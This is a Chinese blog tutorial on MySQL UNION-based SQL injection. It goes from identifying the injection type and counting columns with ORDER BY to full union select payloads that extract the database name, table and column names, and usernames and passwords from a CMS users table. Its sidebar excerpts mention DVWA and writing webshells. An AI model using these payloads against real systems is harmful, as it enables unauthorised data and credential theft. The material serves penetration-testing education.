MySQL之联合注入

最新推荐文章于 2023-09-18 12:48:40 发布
最新推荐文章于 2023-09-18 12:48:40 发布
阅读量156 收藏
点赞数 2
分类专栏: web渗透实战 文章标签: mysql 数据库 SQL注入 联合注入 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46367450/article/details/132460915
版权

文章目录

1.判断注入类型

通过单引号,双引号依次尝试,发现单引号会引发报错,而双引号不会报错,所以是使用单引号的字符串类型

结论:

字符型注入中,哪个符号引发的报错,就代表是哪个符号的字符型注入

2.order by推算字段数

为什么要推算字段数呢?

因为知道了字段数,就能利用联合注入的特性进行sql注入获取更多的信息。

那么如何推算字段数呢?

利用order by的特性----他可以指定列的顺序来进行排序,所以可以在order by后面直接加数字,表示按照第几列排序,一旦数字超过了列数,就会报错,从而可以推算出字段数

3.查数据库

核心原理:联合查询,database()函数

联合查询的两个条件:

  1. 两个查询语句的查询字段数是一样的,否则会报错
  2. 两个查询语句的查询字段类型必须是一致的

例如:通过union进行联合注入,使用database()函数获得数据库表

select * from cms_article where id = 32 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15;

比如,这里获得的数据库表名是cms

4.查数据库表

核心原理:联合查询,database(),GROUP_CONCAT(),hex()函数,information_schema数据库

select * from cms_article where id = 32 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,hex(GROUP_CONCAT(table_name)),12,13,14,15 from information_schema.tables where table_schema = database();

通过information_schema库的tables表中查询对应数据库名的数据表名,并且使用GROUP_CONCAT()函数将所有的表名打印出来,然后转换为hex,将结果进行解码即可获得表名

5.查表的字段名

核心原理:联合查询,GROUP_CONCAT(),hex()函数,information_schema数据库

select * from cms_article where id = -33 union select 1,2,hex(GROUP_CONCAT(column_name)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.COLUMNS where table_name = "cms_users";

通过information_schema库的COLUMNS,查询表字段table_name,值为cms_users的字段信息,并且使用GROUP_CONCAT()函数将所有的字段名打印出来,然后转换为hex,将结果进行解码即可获得字段名

6.查数据

核心原理:联合查询,CONCAT(),hex()函数,information_schema数据库

select * from cms_article where id = 32 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,hex(CONCAT(username,'--',password)),12,13,14,15 from cms.cms_users;

由于知道了要查询的数据库,表名与字段名,然后借助CONCAT()函数可以将想要查询的字段数据拼接成字符串,然后将其输出

yuan_boss
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql联合注入
qq_42409373的博客
06-10 223
union操作符: 用于合并两个或多个查询语句的结果。 union内部的select语句必须拥有相同的数量的列,列也必须拥有相似的数据类型,同时,每条select语句中的列的顺序必须完全相同 union语法: union select column(s) from table union select column(s) from table union all select column(s) from table union select column(s) from table 注:如果前后两条
MYSQL联合注入
qq_39654116的博客
01-04 260
目录简介特定变量查询步骤Mysql版本<5.0Mysql版本>=5.0注入语句 简介 联合注入是使用了union select联合查询,通常用来拼接在where后面,联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截 特定变量 1\. SCHEMATA表 : 提供了当前mysql实例中所有数据库的信息。 2\. TABLES 表 : 提供了关于数据库中的表的信息。 3\. C
mysql联合注入_SQL 注入:联合注入
weixin_30585729的博客
01-20 162
SQL注入一直都是web安全的主要漏洞之一,数年来仍旧是最常见的漏洞,其主要是因为前后端进行数据交互时注入恶意的SQL语句,导致最终执行的语句拼接。往往是因为开发人员防护不严,导致未过滤敏感字符。联合注入联合注入是比较常见的一种,可以说是开发人员没有进行任何过滤。这里用PHP来进行简单的数据交互源代码:$id=$_GET['id'];$conn=mysqli_connect("localhost"...
mysql 联合查询注入
broing55的博客
01-07 523
一. dvwa sql注入 low mid high Low 1.输入1提交 2.输入1’提交 3.输入1 and 1=1 提交 4. 输入1 and 1=2 提交 源码: 列数:2 爆个数据库数据库里的表: 表里的表头: 查user和password: 二.medium级别 使用抓包软件bp抓包 当id=1’ ...
PHP、mysql(手工注入
10-12
- **联合查询注入**:通过构造联合查询,合并两个或更多合法查询,获取额外数据。 - **时间盲注**:当服务器响应时间不同,攻击者可以推测出数据库的信息,而无需直接返回结果。 - **错误回显注入**:利用系统...
mysql后台注入.zip
04-28
4. **联合查询注入**:攻击者可以注入一个联合查询,将应用程序原本的查询与自己的查询组合在一起,从而获取或修改数据。例如,通过`UNION SELECT`操作,可以读取其他表的数据。 5. **堆叠查询注入**:攻击者可以...
MYSQL高级注入教程
04-03
pczygx PC资源共享 MYSQL 高级注入 教程 渗透教程 第一课 MYSQL基础教学I 第二课 MYSQL基础教学II ...第四课 手工注入-联合查询篇 第五课 手工注入-MYSQL5.0暴库 第六课 手工注入-MYSQL注入高级技巧
第01篇:MySQL注入点写WebShell的5种方式1
08-03
这是最常见且最直观的方法,适用于联合注入。攻击者通过`UNION SELECT`结合`INTO OUTFILE`将PHP代码(通常是一句话木马)写入指定的Web目录。为了成功执行此操作,需要满足以下条件: - `secure_file_priv`配置项...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
mysql注入大全讲解(很详细哦)
07-24
mysql注入大全讲解(很详细哦),可以学习一下啊,比较全面了
sql注入基础-mysql联合注入
Redredredfish的博客
12-07 565
原理 sql注入攻击的本质就是把用户输入的参数当做SQL语句来执行,Web应用程序对用户输入数据的合法性没有进行判断和过滤,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。 造成sql注入需要满足两个条件: 1.用户输入可控 2.输入参数被拼接成sql语句执行 危害 敏感信息泄露,获取数据权限,上传webshell,执行命令,篡改网页信息等 常见注入点 GET/POST/PUT/DELETE参数 http头注入(X-Forwarded-For) 文件名 cookie注入 判断注入
SQL注入之union 联合注入
weixin_53711701的博客
01-16 4406
SQL注入之union联合注入
MySQL之union联合注入
最新发布
2301_79299101的博客
09-18 154
我们通过-1' union select 1,(select XXX_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)#当输入的参 x 为整型,Sql 语句类型大致如下:select * from <表名> where id = 'x'这样就要用X'and'1'='1和X'and'1'='2来判断了。1,判断是否存在sql注入:通常是id=XXX’输入,看页面是否会报错,如果有报错,则存在sql漏洞。
mysql union联合注入
Sys1em32 安全之路
12-05 238
记录一下联合查询常用的手工注入语句,这里以dvwa为例,联合查询页面必须要有回显 0x01.判断是否存在注入点: 一般添加单引号查看是否报错,或者and 1=1查看页面是否正常显示,and 1=2查看是否报错,判断存在注入。 0x02.判断字段数 注入语句:http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=1'+orde...
Mysql注入之一 联合注入
笨蛋9的博客
02-17 3180
一 前言作者也在学习web安全,可能文章中或多或少存在一些错误内容。写些手工注入的文章,一方面能加深对这部分知识的印象,一方面也能大家互相学习。 有人可能问:数据库注入不是有很多非常强大的工具,如sqlmap,为什么还要去花些时间去学习手工注入。虽然使用sqlmap等注入工具能很轻松的对拖一个存在注入漏洞无安全狗的网站的数据库,但却无法知道注入的全过程,不方便后续写一些自动化测试的脚本,同时由于是
sql注入之——mysql 联合查询注入
wsnbbz的博客
01-06 521
一、Dvwa low级别 1.判断sql注入漏洞类型为:’为边界的字符串型 2.判断列数和显示位:2列2个显示位 1' order by 2 3.确定数据库:1' union select 1,database()-- - 4.查看数据库有哪些表:1' union select 2,(select group_concat(table_name) from informatio...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值